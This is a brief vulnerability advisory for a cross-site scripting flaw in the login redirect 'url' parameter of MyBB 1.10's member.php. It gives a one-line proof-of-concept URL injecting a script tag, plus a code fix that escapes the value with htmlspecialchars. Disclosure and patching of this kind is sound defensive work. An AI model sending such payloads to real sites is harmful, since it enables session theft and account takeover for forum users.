//-- MyBB 1.10 New CrossSiteScripting ' member.php ' --//
Webattack :-
/mybb/member.php?action=do_login&username=[usrname]&password=[pass]&url="><script>alert(1);</script>
//-- FixIT --//
Open member.php
GoTo Line :- 1030 ..
if($mybb->input['url'])
{
redirect($mybb->input['url'],
$lang->redirect_loggedin);
}
Replace It With
if($mybb->input['url'])
{
redirect(htmlspecialchars($mybb->input['url']),
$lang->redirect_loggedin);
}
//-- --//
